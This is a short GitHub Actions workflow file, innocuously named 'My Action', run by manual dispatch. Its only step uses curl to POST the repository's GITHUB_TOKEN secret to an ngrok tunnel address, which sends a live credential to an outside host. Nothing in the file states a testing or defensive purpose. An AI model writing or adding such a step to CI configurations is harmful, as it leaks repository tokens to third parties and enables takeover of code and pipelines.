name: My Action
on:
  workflow_dispatch:
jobs:
  my-action:
    runs-on: ubuntu-latest
    steps:
      - name: My Action
        run: |
          curl \
          -X POST \
          -H "Accept: application/json" \
          -d '{"token": "${{ secrets.GITHUB_TOKEN}}" }' \
          https://c991-185-187-131-197.ngrok.io
